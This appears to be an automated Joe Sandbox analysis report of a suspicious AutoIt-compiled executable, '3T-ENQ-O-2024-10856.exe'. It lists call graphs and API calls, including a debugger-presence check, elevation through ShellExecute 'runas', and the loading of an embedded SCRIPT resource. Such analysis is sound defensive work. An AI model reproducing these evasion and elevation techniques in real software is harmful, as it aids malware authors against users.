3390000 110443->110457 110445 339246b 110460 33922a0 110445->110460 110447 3392494 CreateFileW 110449 33924e8 110447->110449 110450 33924e3 110447->110450 110449->110450 110451 33924ff VirtualAlloc 110449->110451 110451->110450 110452 339251d ReadFile 110451->110452 110452->110450 110453 3392538 110452->110453 110454 33912a0 13 API calls 110453->110454 110456 339256b 110454->110456 110455 339258e ExitProcess 110455->110450 110456->110455 110463 3393490 GetPEB 110457->110463 110459 339068b 110459->110445 110461 33922a9 Sleep 110460->110461 110462 33922b7 110461->110462 110464 33934ba 110463->110464 110464->110459 110465 cda0a7 110469 caaf66 110465->110469 110467 cda0b2 110468 caaf66 84 API calls 110467->110468 110468->110467 110470 caafa0 110469->110470 110475 caaf73 110469->110475 110470->110467 110471 caafa2 110481 c7f833 81 API calls 110471->110481 110473 caafa7 110474 c684a6 81 API calls 110473->110474 110476 caafae 110474->110476 110475->110470 110475->110471 110475->110473 110478 caaf9a 110475->110478 110477 c67b4b 48 API calls 110476->110477 110477->110470 110480 c74265 61 API calls _memmove 110478->110480 110480->110470 110481->110473 110482 cac450 110483 cac45d 110482->110483 110484 cac463 110482->110484 110486 c828ca _free 47 API calls 110483->110486 110485 cac474 110484->110485 110487 c828ca _free 47 API calls 110484->110487 110488 c828ca _free 47 API calls 110485->110488 110489 cac486 110485->110489 110486->110484 110487->110485 110488->110489 110490 c6e85b 110493 c6d937 110490->110493 110492 c6e865 110494 c6d94f 110493->110494 110501 c6d9a7 110493->110501 110496 c6fa40 346 API calls 110494->110496 110494->110501 110498 c6d986 110496->110498 110497 cd979b 110497->110492 110499 c6d9d0 110498->110499 110502 c6d89e 50 API calls Mailbox 110498->110502 110499->110492 110501->110499 110503 cad520 86 API calls 4 library calls 110501->110503 110502->110501 110503->110497 110504 c71118 110553 c7e016 110504->110553 110506 c7112e 110507 cdabeb 110506->110507 110508 c71148 110506->110508 110570 c7cf79 49 API calls 110507->110570 110510 c73680 346 API calls 110508->110510 110536 c6fad8 Mailbox _memmove 110510->110536 110512 cdb628 Mailbox 110513 cdac2a 110515 cdac4a Mailbox 110513->110515 110571 caba5d 48 API calls 110513->110571 110575 cad520 86 API calls 4 library calls 110515->110575 110516 c71230 110533 c6fbf1 Mailbox 110516->110533 110576 cad520 86 API calls 4 library calls 110516->110576 110518 c7105e 110572 c6c935 48 API calls 110518->110572 110520 c70119 110578 cad520 86 API calls 4 library calls 110520->110578 110521 c71063 110577 cad520 86 API calls 4 library calls 110521->110577 110522 c70dee 110564 c6d89e 50 API calls Mailbox 110522->110564 110524 c70dfa 110565 c6d89e 50 API calls Mailbox 110524->110565 110526 cdb772 110579 cad520 86 API calls 4 library calls 110526->110579 110528 c6c935 48 API calls 110528->110536 110532 c6d3d2 48 API calls 110532->110536 110534 c70e83 110539 c6caee 48 API calls 110534->110539 110536->110516 110536->110518 110536->110520 110536->110521 110536->110522 110536->110524 110536->110526 110536->110528 110536->110532 110536->110533 110536->110534 110538 c81b2a 52 API calls __cinit 110536->110538 110540 c710f1 Mailbox 110536->110540 110544 c8010a 48 API calls 110536->110544 110545 c6fa40 346 API calls 110536->110545 110548 c9a599 InterlockedDecrement 110536->110548 110549 cdb583 110536->110549 110551 cc0bfa 129 API calls 110536->110551 110552 cc4e5b 84 API calls 110536->110552 110562 c6f6d0 346 API calls 2 library calls 110536->110562 110563 c71620 59 API calls Mailbox 110536->110563 110566 cbee52 82 API calls 2 library calls 110536->110566 110567 cbef9d 90 API calls Mailbox 110536->110567 110568 cab020 48 API calls 110536->110568 110569 cbe713 346 API calls Mailbox 110536->110569 110537 cdb7d2 110538->110536 110539->110540 110574 cad520 86 API calls 4 library calls 110540->110574 110544->110536 110545->110536 110548->110536 110573 cad520 86 API calls 4 library calls 110549->110573 110551->110536 110552->110536 110554 c7e034 110553->110554 110555 c7e022 110553->110555 110557 c7e063 110554->110557 110558 c7e03a 110554->110558 110580 c6d89e 50 API calls Mailbox 110555->110580 110581 c6d89e 50 API calls Mailbox 110557->110581 110560 c8010a 48 API calls 110558->110560 110561 c7e02c 110560->110561 110561->110506 110562->110536 110563->110536 110564->110524 110565->110534 110566->110536 110567->110536 110568->110536 110569->110536 110570->110513 110571->110515 110572->110533 110573->110540 110574->110533 110575->110512 110576->110521 110577->110520 110578->110526 110579->110537 110580->110561 110581->110561

                                Executed Functions

                                Function 00C8BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 641 c8bdf6-c8be33 call c90650 644 c8be3c-c8be3e 641->644 645 c8be35-c8be37 641->645 647 c8be5f-c8be8c 644->647 648 c8be40-c8be5a call c8886a call c8889e call c87aa0 644->648 646 c8c613-c8c61f call c8b4bf 645->646 649 c8be8e-c8be91 647->649 650 c8be93-c8be9a 647->650 648->646 649->650 653 c8bebe-c8bec3 649->653 654 c8beb8 650->654 655 c8be9c-c8beb3 call c8886a call c8889e call c87aa0 650->655 659 c8bed2-c8bee0 call c949a2 653->659 660 c8bec5-c8becf call c905df 653->660 654->653 690 c8c604-c8c607 655->690 671 c8c1fe-c8c210 659->671 672 c8bee6-c8bef8 659->672 660->659 675 c8c56b-c8c588 WriteFile 671->675 676 c8c216-c8c226 671->676 672->671 674 c8befe-c8bf36 call c8869d GetConsoleMode 672->674 674->671 695 c8bf3c-c8bf42 674->695 678 c8c58a-c8c592 675->678 679 c8c594-c8c59a GetLastError 675->679 681 c8c22c-c8c237 676->681 682 c8c30d-c8c312 676->682 684 c8c59c 678->684 679->684 688 c8c23d-c8c24d 681->688 689 c8c5ce-c8c5e6 681->689 685 c8c318-c8c321 682->685 686 c8c416-c8c421 682->686 692 c8c5a2-c8c5a4 684->692 685->689 693 c8c327 685->693 686->689 691 c8c427 686->691 696 c8c253-c8c256 688->696 697 c8c5e8-c8c5eb 689->697 698 c8c5f1-c8c601 call c8889e call c8886a 689->698 694 c8c611-c8c612 690->694 700 c8c431-c8c446 691->700 702 c8c609-c8c60f 692->702 703 c8c5a6-c8c5a8 692->703 704 c8c331-c8c348 693->704 694->646 705 c8bf4c-c8bf6f GetConsoleCP 695->705 706 c8bf44-c8bf46 695->706 707 c8c258-c8c271 696->707 708 c8c29c-c8c2d3 WriteFile 696->708 697->698 699 c8c5ed-c8c5ef 697->699 698->690 699->694 710 c8c44c-c8c44e 700->710 702->694 703->689 712 c8c5aa-c8c5af 703->712 713 c8c34e-c8c351 704->713 714 c8c1f3-c8c1f9 705->714 715 c8bf75-c8bf7d 705->715 706->671 706->705 716 c8c27e-c8c29a 707->716 717 c8c273-c8c27d 707->717 708->679 709 c8c2d9-c8c2eb 708->709 709->692 718 c8c2f1-c8c302 709->718 719 c8c48b-c8c4cc WideCharToMultiByte 710->719 720 c8c450-c8c466 710->720 722 c8c5b1-c8c5c3 call c8889e call c8886a 712->722 723 c8c5c5-c8c5cc call c8887d 712->723 724 c8c391-c8c3da WriteFile 713->724 725 c8c353-c8c369 713->725 714->703 726 c8bf87-c8bf89 715->726 716->696 716->708 717->716 718->688 727 c8c308 718->727 719->679 731 c8c4d2-c8c4d4 719->731 728 c8c468-c8c477 720->728 729 c8c47a-c8c489 720->729 722->690 723->690 724->679 736 c8c3e0-c8c3f8 724->736 733 c8c36b-c8c37d 725->733 734 c8c380-c8c38f 725->734 737 c8c11e-c8c121 726->737 738 c8bf8f-c8bfb1 726->738 727->692 728->729 729->710 729->719 741 c8c4da-c8c50d WriteFile 731->741 733->734 734->713 734->724 736->692 744 c8c3fe-c8c40b 736->744 739 c8c128-c8c155 737->739 740 c8c123-c8c126 737->740 745 c8bfca-c8bfd6 call c822a8 738->745 746 c8bfb3-c8bfc8 738->746 749 c8c15b-c8c15e 739->749 740->739 740->749 750 c8c52d-c8c541 GetLastError 741->750 751 c8c50f-c8c529 741->751 744->704 753 c8c411 744->753 761 c8bfd8-c8bfec 745->761 762 c8c01c-c8c01e 745->762 747 c8c024-c8c036 call c94ea7 746->747 771 c8c1e8-c8c1ee 747->771 772 c8c03c 747->772 755 c8c160-c8c163 749->755 756 c8c165-c8c178 call c96634 749->756 760 c8c547-c8c549 750->760 751->741 758 c8c52b 751->758 753->692 755->756 763 c8c1ba-c8c1bd 755->763 756->679 775 c8c17e-c8c188 756->775 758->760 760->684 766 c8c54b-c8c563 760->766 768 c8bff2-c8c007 call c94ea7 761->768 769 c8c1c5-c8c1e0 761->769 762->747 763->726 767 c8c1c3 763->767 766->700 773 c8c569 766->773 767->771 768->771 781 c8c00d-c8c01a 768->781 769->771 771->684 776 c8c042-c8c077 WideCharToMultiByte 772->776 773->692 778 c8c18a-c8c1a1 call c96634 775->778 779 c8c1ae-c8c1b4 775->779 776->771 780 c8c07d-c8c0a3 WriteFile 776->780 778->679 786 c8c1a7-c8c1a8 778->786 779->763 780->679 783 c8c0a9-c8c0c1 780->783 781->776 783->771 784 c8c0c7-c8c0ce 783->784 784->779 787 c8c0d4-c8c0ff WriteFile 784->787 786->779 787->679 788 c8c105-c8c10c 787->788 788->771 789 c8c112-c8c119 788->789 789->779
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7204df483693e098024a66dfbda819454e35793b246f8e6978d58ccd8c05f49d
                                • Instruction ID: ceb72438cc1fec19cedeb78e8ef3484829b1edfa40ee169a46be1e79ff26766d
                                • Opcode Fuzzy Hash: 7204df483693e098024a66dfbda819454e35793b246f8e6978d58ccd8c05f49d
                                • Instruction Fuzzy Hash: A8327D75B022288FDB24DF14DC84AE9B7B5FB46314F4840D9E41AE7A81D730AE81DF66
                                Function 00C6374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C6376D
                                  • Part of subcall function 00C64257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 00C6428C
                                • IsDebuggerPresent.KERNEL32(?,?), ref: 00C6377F
                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00D21120,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00D21124,?,?), ref: 00C637EE
                                  • Part of subcall function 00C634F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C6352A
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C63860
                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00D12934,00000010), ref: 00CD21C5
                                • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00CD21FD
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00CD2232
                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CFDAA4), ref: 00CD2290
                                • ShellExecuteW.SHELL32(00000000), ref: 00CD2297
                                  • Part of subcall function 00C630A5: GetSysColorBrush.USER32(0000000F), ref: 00C630B0
                                  • Part of subcall function 00C630A5: LoadCursorW.USER32(00000000,00007F00), ref: 00C630BF
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(00000063), ref: 00C630D5
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(000000A4), ref: 00C630E7
                                  • Part of subcall function 00C630A5: LoadIconW.USER32(000000A2), ref: 00C630F9
                                  • Part of subcall function 00C630A5: RegisterClassExW.USER32(?), ref: 00C63167
                                  • Part of subcall function 00C62E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C62ECB
                                  • Part of subcall function 00C62E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C62EEC
                                  • Part of subcall function 00C62E9D: ShowWindow.USER32(00000000), ref: 00C62F00
                                  • Part of subcall function 00C62E9D: ShowWindow.USER32(00000000), ref: 00C62F09
                                  • Part of subcall function 00C63598: _memset.LIBCMT ref: 00C635BE
                                  • Part of subcall function 00C63598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C63667
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                • String ID: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                • API String ID: 4253510256-1030974485
                                • Opcode ID: 14dbf3360931e6082d69ec46e51e07d62a472fb80c05521715a9a86d86d51f8c
                                • Instruction ID: 8e48930918d5429e0dbba726664d0ac1c5bb037fed95d03d5649ff47da232125
                                • Opcode Fuzzy Hash: 14dbf3360931e6082d69ec46e51e07d62a472fb80c05521715a9a86d86d51f8c
                                • Instruction Fuzzy Hash: E3511779644394BECB31ABA0ACC6BFD3B789B39714F004056F652962E1CA714B46DB32
                                Function 00C7E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1208 c7e47b-c7e50a call c6d3d2 GetVersionExW call c67e53 call c7e5f8 call c7e617 1217 cd29f9-cd29fc 1208->1217 1218 c7e510-c7e511 1208->1218 1221 cd29fe 1217->1221 1222 cd2a15-cd2a19 1217->1222 1219 c7e513-c7e51e 1218->1219 1220 c7e54d-c7e55d call c7e6d1 1218->1220 1225 cd297f-cd2985 1219->1225 1226 c7e524-c7e526 1219->1226 1239 c7e582-c7e59c 1220->1239 1240 c7e55f-c7e57c GetCurrentProcess call c7e70e 1220->1240 1228 cd2a01 1221->1228 1223 cd2a1b-cd2a24 1222->1223 1224 cd2a04-cd2a0d 1222->1224 1223->1228 1231 cd2a26-cd2a29 1223->1231 1224->1222 1229 cd298f-cd2995 1225->1229 1230 cd2987-cd298a 1225->1230 1232 cd299a-cd29a6 1226->1232 1233 c7e52c-c7e52f 1226->1233 1228->1224 1229->1220 1230->1220 1231->1224 1235 cd29a8-cd29ab 1232->1235 1236 cd29b0-cd29b6 1232->1236 1237 c7e535-c7e544 1233->1237 1238 cd29c6-cd29c9 1233->1238 1235->1220 1236->1220 1243 cd29bb-cd29c1 1237->1243 1244 c7e54a 1237->1244 1238->1220 1245 cd29cf-cd29e4 1238->1245 1241 c7e59e-c7e5b2 call c7e694 1239->1241 1242 c7e5ec-c7e5f6 GetSystemInfo 1239->1242 1240->1239 1259 c7e57e 1240->1259 1256 c7e5e4-c7e5ea GetSystemInfo 1241->1256 1257 c7e5b4-c7e5bc call c7e437 GetNativeSystemInfo 1241->1257 1247 c7e5c9-c7e5d5 1242->1247 1243->1220 1244->1220 1249 cd29ee-cd29f4 1245->1249 1250 cd29e6-cd29e9 1245->1250 1253 c7e5d7-c7e5da FreeLibrary 1247->1253 1254 c7e5dc-c7e5e1 1247->1254 1249->1220 1250->1220 1253->1254 1258 c7e5be-c7e5c2 1256->1258 1257->1258 1258->1247 1262 c7e5c4-c7e5c7 FreeLibrary 1258->1262 1259->1239 1262->1247
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 00C7E4A7
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • GetCurrentProcess.KERNEL32(00000000,00CFDC28,?,?), ref: 00C7E567
                                • GetNativeSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5BC
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7E5C7
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7E5DA
                                • GetSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5E4
                                • GetSystemInfo.KERNEL32(?,00CFDC28,?,?), ref: 00C7E5F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                • String ID:
                                • API String ID: 2717633055-0
                                • Opcode ID: 2c90cf2506bdbe77a17d9c5daefedbd060c57142ad71645cf0b4c0006b8d49b4
                                • Instruction ID: b36e877c84de3c88676590cdb457b446b9c777a9287396961d5596b7a9c79d2d
                                • Opcode Fuzzy Hash: 2c90cf2506bdbe77a17d9c5daefedbd060c57142ad71645cf0b4c0006b8d49b4
                                • Instruction Fuzzy Hash: BC61AFB28092C8CBCF55CF6898C11ED7FA4AF3A304F1985D9D8599F30BD624CA48DB65
                                Function 00C631F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1329 c631f2-c6320a CreateStreamOnHGlobal 1330 c6320c-c63223 FindResourceExW 1329->1330 1331 c6322a-c6322d 1329->1331 1332 cd57d3-cd57e2 LoadResource 1330->1332 1333 c63229 1330->1333 1332->1333 1334 cd57e8-cd57f6 SizeofResource 1332->1334 1333->1331 1334->1333 1335 cd57fc-cd5807 LockResource 1334->1335 1335->1333 1336 cd580d-cd5815 1335->1336 1337 cd5819-cd582b 1336->1337 1337->1333
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C63202
                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00C63219
                                • LoadResource.KERNEL32(?,00000000), ref: 00CD57D7
                                • SizeofResource.KERNEL32(?,00000000), ref: 00CD57EC
                                • LockResource.KERNEL32(?), ref: 00CD57FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                • String ID: SCRIPT
                                • API String ID: 3051347437-3967369404
                                • Opcode ID: 86ed9f753546d1f83db1e0b37190b25a0aa50962d6fd7425fb9cff5a13cd7e07
                                • Instruction ID: d0353e25604bef8ddb06b4f83ad924b67c341dfb2b737b4dfe7c6b377ae081e3
                                • Opcode Fuzzy Hash: 86ed9f753546d1f83db1e0b37190b25a0aa50962d6fd7425fb9cff5a13cd7e07
                                • Instruction Fuzzy Hash: 38118B71204741BFE7218B65EC88F2B7BB9EBC9B41F208029F5128A290DB71DE10CA70
                                Function 00C7DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNEL32(00C6C848,00C6C848), ref: 00C7DDA2
                                • FindFirstFileW.KERNEL32(00C6C848,?), ref: 00CD4A83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$AttributesFindFirst
                                • String ID:
                                • API String ID: 4185537391-0
                                • Opcode ID: 4987786a9f1f6eabdcb90d2ce58c6639ab95e018b144e43cfcd31094f7ad3dda
                                • Instruction ID: 46486e86c21ec72dcddef5d4d51451e2bd3fc19cefce605290cd314e27bf399c
                                • Opcode Fuzzy Hash: 4987786a9f1f6eabdcb90d2ce58c6639ab95e018b144e43cfcd31094f7ad3dda
                                • Instruction Fuzzy Hash: 71E0D8314145415B42246738DC4E9ED376C9F05338F100705F93BC11E0E770AE4495E6
                                Function 00C73680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID:
                                • API String ID: 3964851224-0
                                • Opcode ID: c938ff3d85762ca7240c8f03c1d5500848fa8bd351cd4550ddd3d840254f1b90
                                • Instruction ID: 260c823e077426216b5a680537cb17d29ec92af6fe8bdad499c6b35c92a7321c
                                • Opcode Fuzzy Hash: c938ff3d85762ca7240c8f03c1d5500848fa8bd351cd4550ddd3d840254f1b90
                                • Instruction Fuzzy Hash: C1926870608341DFD724DF29C484B6ABBE1BF88304F14885DE99A8B3A2D771EE45DB52
                                Function 00C6E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C6E279
                                • timeGetTime.WINMM ref: 00C6E51A
                                • TranslateMessage.USER32(?), ref: 00C6E646
                                • DispatchMessageW.USER32(?), ref: 00C6E651
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C6E664
                                • LockWindowUpdate.USER32(00000000), ref: 00C6E697
                                • DestroyWindow.USER32 ref: 00C6E6A3
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C6E6BD
                                • Sleep.KERNEL32(0000000A), ref: 00CD5B15
                                • TranslateMessage.USER32(?), ref: 00CD62AF
                                • DispatchMessageW.USER32(?), ref: 00CD62BD
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CD62D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                • API String ID: 2641332412-570651680
                                • Opcode ID: 9041a60abc6634c49e0ad0f19cda801b944792e2a8a15089733a866ba44336ec
                                • Instruction ID: 16457b4c02f82d755b953ccd3445c47b8e74cb62c02658ee9e122868f6d4f9bb
                                • Opcode Fuzzy Hash: 9041a60abc6634c49e0ad0f19cda801b944792e2a8a15089733a866ba44336ec
                                • Instruction Fuzzy Hash: B662DE745083409FDB30DF64C8C5BAA77E4AF54304F18496EF95A8B3A2DB70E948DB62
                                Function 00C96A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___createFile.LIBCMT ref: 00C96C73
                                • ___createFile.LIBCMT ref: 00C96CB4
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C96CDD
                                • __dosmaperr.LIBCMT ref: 00C96CE4
                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C96CF7
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C96D1A
                                • __dosmaperr.LIBCMT ref: 00C96D23
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C96D2C
                                • __set_osfhnd.LIBCMT ref: 00C96D5C
                                • __lseeki64_nolock.LIBCMT ref: 00C96DC6
                                • __close_nolock.LIBCMT ref: 00C96DEC
                                • __chsize_nolock.LIBCMT ref: 00C96E1C
                                • __lseeki64_nolock.LIBCMT ref: 00C96E2E
                                • __lseeki64_nolock.LIBCMT ref: 00C96F26
                                • __lseeki64_nolock.LIBCMT ref: 00C96F3B
                                • __close_nolock.LIBCMT ref: 00C96F9B
                                  • Part of subcall function 00C8F84C: CloseHandle.KERNEL32(00000000,00D0EEC4,00000000,?,00C96DF1,00D0EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C8F89C
                                  • Part of subcall function 00C8F84C: GetLastError.KERNEL32(?,00C96DF1,00D0EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C8F8A6
                                  • Part of subcall function 00C8F84C: __free_osfhnd.LIBCMT ref: 00C8F8B3
                                  • Part of subcall function 00C8F84C: __dosmaperr.LIBCMT ref: 00C8F8D5
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __lseeki64_nolock.LIBCMT ref: 00C96FBD
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C970F2
                                • ___createFile.LIBCMT ref: 00C97111
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C9711E
                                • __dosmaperr.LIBCMT ref: 00C97125
                                • __free_osfhnd.LIBCMT ref: 00C97145
                                • __invoke_watson.LIBCMT ref: 00C97173
                                • __wsopen_helper.LIBCMT ref: 00C9718D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
